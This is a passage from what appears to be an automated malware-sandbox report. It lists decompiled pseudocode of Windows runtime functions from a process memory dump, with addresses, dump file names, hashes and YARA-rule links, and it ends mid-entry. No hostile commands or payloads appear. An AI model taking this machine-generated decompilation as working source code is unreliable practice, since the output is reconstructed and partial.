																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E036C922A(_t99);
										_t64 = E036E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03798B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x37b86c0; // 0x2e807b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x37b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x37b86bc;
													_t87 = 0x37b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E036C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x37b86c4;
												_t87 = 0x37b86c0;
												L27:
												E036F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0371D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x37b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x37b538c = _t51;
						goto L6;
					}
				}
			}




















                                      0x036c9082
                                      0x036c9083
                                      0x036c9084
                                      0x036c9085
                                      0x036c9087
                                      0x036c9096
                                      0x036c9098
                                      0x036c9098
                                      0x036c909e
                                      0x036c90a8
                                      0x036c90e7
                                      0x036c90e7
                                      0x036c90aa
                                      0x036c90b0
                                      0x036c90b7
                                      0x036c90bd
                                      0x036c90dd
                                      0x036c90e6
                                      0x036c90bf
                                      0x036c90bf
                                      0x036c90c7
                                      0x036c90cf
                                      0x036c90f1
                                      0x036c90f2
                                      0x036c90f4
                                      0x036c90f5
                                      0x036c90f6
                                      0x036c90f7
                                      0x036c90f8
                                      0x036c90f9
                                      0x036c90fa
                                      0x036c90fb
                                      0x036c90fc
                                      0x036c90fd
                                      0x036c90fe
                                      0x036c90ff
                                      0x036c9100
                                      0x036c9102
                                      0x036c9107
                                      0x036c910c
                                      0x036c9110
                                      0x036c9113
                                      0x036c9115
                                      0x036c9136
                                      0x036c913f
                                      0x036c9143
                                      0x037237e4
                                      0x037237e4
                                      0x036c9117
                                      0x036c9117
                                      0x036c911d
                                      0x00000000
                                      0x036c911f
                                      0x036c911f
                                      0x036c9125
                                      0x00000000
                                      0x036c9127
                                      0x036c912d
                                      0x036c9130
                                      0x036c9134
                                      0x036c9158
                                      0x036c915d
                                      0x036c9161
                                      0x036c9168
                                      0x03723715
                                      0x036c916e
                                      0x036c916e
                                      0x036c9175
                                      0x036c9177
                                      0x036c917e
                                      0x036c917f
                                      0x036c9182
                                      0x036c9182
                                      0x036c9187
                                      0x036c9187
                                      0x036c918a
                                      0x036c918d
                                      0x036c918f
                                      0x036c9192
                                      0x036c9195
                                      0x036c9198
                                      0x036c9198
                                      0x036c9198
                                      0x036c919a
                                      0x00000000
                                      0x00000000
                                      0x0372371f
                                      0x03723721
                                      0x03723727
                                      0x0372372f
                                      0x03723733
                                      0x03723735
                                      0x03723738
                                      0x0372373b
                                      0x0372373d
                                      0x03723740
                                      0x00000000
                                      0x03723746
                                      0x03723746
                                      0x03723749
                                      0x00000000
                                      0x0372374f
                                      0x0372374f
                                      0x03723751
                                      0x03723757
                                      0x03723759
                                      0x0372375c
                                      0x0372375c
                                      0x0372375e
                                      0x0372375e
                                      0x03723761
                                      0x03723764
                                      0x00000000
                                      0x00000000
                                      0x03723766
                                      0x03723768
                                      0x037237a3
                                      0x037237a3
                                      0x037237a5
                                      0x037237a7
                                      0x037237ad
                                      0x037237b0
                                      0x037237b2
                                      0x037237bc
                                      0x037237c2
                                      0x037237c2
                                      0x037237b2
                                      0x036c9187
                                      0x036c9187
                                      0x036c918a
                                      0x036c918d
                                      0x036c918f
                                      0x036c9192
                                      0x036c9195
                                      0x00000000
                                      0x036c9195
                                      0x00000000
                                      0x0372376a
                                      0x0372376a
                                      0x0372376a
                                      0x0372376c
                                      0x0372376c
                                      0x0372376f
                                      0x03723775
                                      0x00000000
                                      0x00000000
                                      0x03723777
                                      0x03723779
                                      0x03723782
                                      0x03723787
                                      0x03723789
                                      0x03723790
                                      0x03723790
                                      0x0372378b
                                      0x0372378b
                                      0x0372378b
                                      0x03723792
                                      0x03723795
                                      0x00000000
                                      0x03723795
                                      0x00000000
                                      0x03723779
                                      0x03723798
                                      0x00000000
                                      0x03723798
                                      0x00000000
                                      0x03723768
                                      0x0372379b
                                      0x0372379b
                                      0x03723751
                                      0x03723749
                                      0x00000000
                                      0x03723740
                                      0x036c91a0
                                      0x036c91a3
                                      0x036c91a9
                                      0x036c91b0
                                      0x00000000
                                      0x036c91b0
                                      0x036c9187
                                      0x036c91b4
                                      0x036c91b4
                                      0x036c91bb
                                      0x036c91c0
                                      0x036c91c5
                                      0x036c91c7
                                      0x037237da
                                      0x036c91cd
                                      0x036c91cd
                                      0x036c91cd
                                      0x036c91d2
                                      0x036c91d5
                                      0x036c9239
                                      0x036c9239
                                      0x036c91d7
                                      0x036c91db
                                      0x036c91e1
                                      0x036c91e7
                                      0x036c91fd
                                      0x036c9203
                                      0x036c921e
                                      0x036c9223
                                      0x00000000
                                      0x036c9205
                                      0x036c9205
                                      0x036c9208
                                      0x036c920c
                                      0x036c9214
                                      0x036c9214
                                      0x036c920c
                                      0x036c91e9
                                      0x036c91e9
                                      0x036c91ee
                                      0x036c91f3
                                      0x036c91f3
                                      0x036c91f3
                                      0x036c91e7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036c9134
                                      0x036c9125
                                      0x036c911d
                                      0x036c914e
                                      0x036c90d1
                                      0x036c90d1
                                      0x036c90d3
                                      0x036c90d6
                                      0x036c90d8
                                      0x00000000
                                      0x036c90d8
                                      0x036c90cf

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a9b10eaa1e2a9e2ba8979d38b10b8ab00686a10a114bb4b98e2b8a995415213
                                      • Instruction ID: 6c4f5e93cb1f3a7aaba9ad9443199d4f50735feb739720416f405a70c6bdd9cf
                                      • Opcode Fuzzy Hash: 0a9b10eaa1e2a9e2ba8979d38b10b8ab00686a10a114bb4b98e2b8a995415213
                                      • Instruction Fuzzy Hash: 8D01DC72A212448FD328DF08D940B22BBF9EB86325F29806EE101CF791D374DC41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03794015, Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E03794015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E036E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E036E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x37b86ac);
					E036CF900(0x37b86d4, _t28);
					E036DFFB0(0x37b86ac, _t28, 0x37b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E036DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                      0x0379401a
                                      0x0379401e
                                      0x03794023
                                      0x03794028
                                      0x03794029
                                      0x0379402b
                                      0x0379402f
                                      0x03794043
                                      0x03794046
                                      0x03794051
                                      0x03794057
                                      0x0379405f
                                      0x03794062
                                      0x03794067
                                      0x0379406f
                                      0x0379407c
                                      0x0379407c
                                      0x0379408c
                                      0x0379408c
                                      0x03794097

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d1468c6f31f076b563669c4f7569a09bce6b259a0e5d153d2db66e4040e92dd4
                                      • Instruction ID: f7e0203bbfca2e3676ea058b0306ace7a40c0fd8354e9a31b02bc75f9fb11c42
                                      • Opcode Fuzzy Hash: d1468c6f31f076b563669c4f7569a09bce6b259a0e5d153d2db66e4040e92dd4
                                      • Instruction Fuzzy Hash: C001DF76202A887FD614EB69CD80E13B7ACEB49660B000629F5088FA11CB24EC11C6E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0378138A, Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E0378138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x37bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0370FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0370B640(E03709AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                      0x0378138a
                                      0x0378138a
                                      0x03781399
                                      0x037813a3
                                      0x037813a8
                                      0x037813aa
                                      0x037813b5
                                      0x037813bb
                                      0x037813c3
                                      0x037813c6
                                      0x037813c9
                                      0x037813d4
                                      0x037813e6
                                      0x037813d6
                                      0x037813df
                                      0x037813df
                                      0x037813f1
                                      0x037813f2
                                      0x037813f4
                                      0x037813f9
                                      0x0378140e

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 878f74e0da3c9db1c79069c06a1d7f58d23c71d8c0a4f92dc37836f3bdb29735
                                      • Instruction ID: 12da8aa98ecc1185e3723e741c71be146b43fd2c87bf02b7582964147ae1cfb0
                                      • Opcode Fuzzy Hash: 878f74e0da3c9db1c79069c06a1d7f58d23c71d8c0a4f92dc37836f3bdb29735
                                      • Instruction Fuzzy Hash: 56015275A01318EFCB14EFA9D885FAEB7B8EF45710F404066F904EB681D674DA01C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037814FB, Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E037814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x37bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0370FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0370B640(E03709AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                      0x037814fb
                                      0x037814fb
                                      0x0378150a
                                      0x03781514
                                      0x03781519
                                      0x0378151b
                                      0x03781526
                                      0x0378152c
                                      0x03781534
                                      0x03781537
                                      0x0378153a
                                      0x03781545
                                      0x03781557
                                      0x03781547
                                      0x03781550
                                      0x03781550
                                      0x03781562
                                      0x03781563
                                      0x03781565
                                      0x0378156a
                                      0x0378157f

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e00b3644a535b0d88af88364b2f2644fd38318e5af6419a09eb3aa23063c767
                                      • Instruction ID: ad75afafb5ffa3da6ba3465e0e234f62590ff80e7572a69bf8591492743afd8b
                                      • Opcode Fuzzy Hash: 3e00b3644a535b0d88af88364b2f2644fd38318e5af6419a09eb3aa23063c767
                                      • Instruction Fuzzy Hash: 29018C75A01248EBCB10EFA8D845EAEBBB8EF45700F40406AF904EB380DA74DA01CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C58EC, Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E036C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x37bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x36a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E036C5943() != 0 &&  *0x37b5320 > 5) {
					E03747B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03747B5E( &_v28, _t28);
					_t11 = E03747B9C(0x37b5320, 0x36abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0370B640(_t11, _t17, _v8 ^ _t29, 0x36abf15, _t27, _t28);
			}















                                      0x036c58fb
                                      0x036c58fe
                                      0x036c5906
                                      0x036c590a
                                      0x036c593c
                                      0x036c593c
                                      0x036c590c
                                      0x036c590c
                                      0x036c5911
                                      0x00000000
                                      0x036c5913
                                      0x036c5913
                                      0x036c5913
                                      0x036c5911
                                      0x036c591d
                                      0x03721035
                                      0x0372103c
                                      0x0372103f
                                      0x03721056
                                      0x03721056
                                      0x036c593b

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4887f5ffc7993edbacaceb5a2118bbf4447699bbebcb982014185b24361ecb71
                                      • Instruction ID: 62875224d4e2b5f6719f1fb4269c9fa20519fe57665fdf1c49de5d83579ac376
                                      • Opcode Fuzzy Hash: 4887f5ffc7993edbacaceb5a2118bbf4447699bbebcb982014185b24361ecb71
                                      • Instruction Fuzzy Hash: 75018875A106889BC714EE6ADD04ABEF7B8EB46130B9940ADDA169B344DF30ED05C650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0377FE3F, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 59%
                                      			E0377FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x37bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0370FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                      0x0377fe3f
                                      0x0377fe3f
                                      0x0377fe4e
                                      0x0377fe58
                                      0x0377fe5d
                                      0x0377fe5f
                                      0x0377fe6a
                                      0x0377fe72
                                      0x0377fe75
                                      0x0377fe78
                                      0x0377fe83
                                      0x0377fe95
                                      0x0377fe85
                                      0x0377fe8e
                                      0x0377fe8e
                                      0x0377fea0
                                      0x0377fea1
                                      0x0377fea3
                                      0x0377fea8
                                      0x0377febd

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a656203895ae0d2d07ad395486125c009f1334c93850d23808d1ba56753b6059
                                      • Instruction ID: a02fbb481aa26478de5378b55019a31f070b8ceaf55c5cde1e19ac3bd987dae8
                                      • Opcode Fuzzy Hash: a656203895ae0d2d07ad395486125c009f1334c93850d23808d1ba56753b6059
                                      • Instruction Fuzzy Hash: 86018F75A01308EBCB14EFA9D845FAEBBB8EF44700F00406AF900EB291DA74DA01C7A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0377FEC0, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 59%
                                      			E0377FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x37bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0370FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                      0x0377fec0
                                      0x0377fec0
                                      0x0377fecf
                                      0x0377fed9
                                      0x0377fede
                                      0x0377fee0
                                      0x0377feeb
                                      0x0377fef3
                                      0x0377fef6
                                      0x0377fef9
                                      0x0377ff04
                                      0x0377ff16
                                      0x0377ff06
                                      0x0377ff0f
                                      0x0377ff0f
                                      0x0377ff21
                                      0x0377ff22
                                      0x0377ff24
                                      0x0377ff29
                                      0x0377ff3e

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 64da48e165a02d73a53c98d12af4ba6726736239cdca95db17214d89ff53e921
                                      • Instruction ID: bf72032f8177b8277a2b9dae3ba0627fcf6d9203a1177f7979db81d8346f2ba0
                                      • Opcode Fuzzy Hash: 64da48e165a02d73a53c98d12af4ba6726736239cdca95db17214d89ff53e921
                                      • Instruction Fuzzy Hash: 86018475A01308EBCB14DFA9D845FAEB7B8EF45700F004066F900EB291EA74DA01C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03791074, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E03791074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0379165E(__ebx, 0x37b8ae4, (__edx -  *0x37b8b04 >> 0x14) + (__edx -  *0x37b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x37b8b04 >> 0x14) + (__edx -  *0x37b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0378AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E036E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0377FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                      0x03791074
                                      0x03791080
                                      0x03791082
                                      0x0379108a
                                      0x0379108f
                                      0x03791093
                                      0x037910ab
                                      0x037910ab
                                      0x037910c3
                                      0x037910cf
                                      0x037910e1
                                      0x037910d1
                                      0x037910da
                                      0x037910da
                                      0x037910e9
                                      0x037910f5
                                      0x037910f5
                                      0x037910fe

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0d1556aabff7049292a75b2aeb54cfd4a242e29944c5b6c37afc9545bc1adf86
                                      • Instruction ID: 671f9cb2cd2b110a41e8abedeaebc307f90c2b9f7ebf8c1209c3cb290475ac0f
                                      • Opcode Fuzzy Hash: 0d1556aabff7049292a75b2aeb54cfd4a242e29944c5b6c37afc9545bc1adf86
                                      • Instruction Fuzzy Hash: 7B014C7650474AEFDB10EF69D944B1AB7E9AF84310F44C62AF89587290EE31D450CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036DB02A, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E036E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03747016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                      0x036db037
                                      0x036db039
                                      0x036db03b
                                      0x036db040
                                      0x0372a60e
                                      0x00000000
                                      0x00000000
                                      0x0372a61d
                                      0x036db04b
                                      0x036db04e
                                      0x0372a627
                                      0x0372a634
                                      0x00000000
                                      0x00000000
                                      0x0372a641
                                      0x0372a653
                                      0x0372a643
                                      0x0372a64c
                                      0x0372a64c
                                      0x0372a65b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0372a66c
                                      0x036db057
                                      0x036db057
                                      0x036db057
                                      0x036db046
                                      0x036db046
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                      • Instruction ID: ee09ad2f4b829e398ad73c9bd170311df3fd4af8e8b1f55055111834fd8b5b5e
                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                      • Instruction Fuzzy Hash: 19018F32605A84DFD726C75CD988F76BBDCEB45B50F0E00A1F919CBA65DB28DC40C625
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03798A62, Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E03798A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x37bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E036E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0370B640(E03709AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                      0x03798a62
                                      0x03798a71
                                      0x03798a79
                                      0x03798a82
                                      0x03798a85
                                      0x03798a89
                                      0x03798a8c
                                      0x03798a8f
                                      0x03798a92
                                      0x03798a95
                                      0x03798a9f
                                      0x03798ab1
                                      0x03798aa1
                                      0x03798aaa
                                      0x03798aaa
                                      0x03798abc
                                      0x03798abd
                                      0x03798abf
                                      0x03798ac4
                                      0x03798ada

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2420d638e58cbd82a9de409d14125886aed13d3a67d50fb0f2adc577345f016
                                      • Instruction ID: 70baaa88051dba16301559b9744585c8ed7aa5efb5b808c191ff7408d385d36f
                                      • Opcode Fuzzy Hash: d2420d638e58cbd82a9de409d14125886aed13d3a67d50fb0f2adc577345f016
                                      • Instruction Fuzzy Hash: 8E011E75A0121CAFDB00DFA9E9859AEB7B8EF49310F10405AF904EB351D674A900CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03798ED6, Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
